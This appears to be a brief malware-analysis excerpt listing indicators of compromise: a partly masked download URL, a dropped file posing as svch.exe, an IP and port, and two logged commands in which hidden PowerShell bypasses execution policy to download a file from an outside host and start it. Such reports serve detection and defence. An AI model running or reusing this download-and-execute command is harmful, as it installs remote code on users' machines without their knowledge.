Technical Information
- http://ha###.502ok.com/hm as c:/windows/inf/svch.exe
- agmkis2
- '11#.#7.198.180':6688
- DNS ASK ha###.502ok.com
- '%WINDIR%\syswow64\cmd.exe' /c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http://ha###.502ok.com/hm','C:/WINDOWS/inf/svch.exe');start-process C:/W...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http://ha###.502ok.com/hm','C:/WINDOWS/inf/svch.exe');start-process C:/W...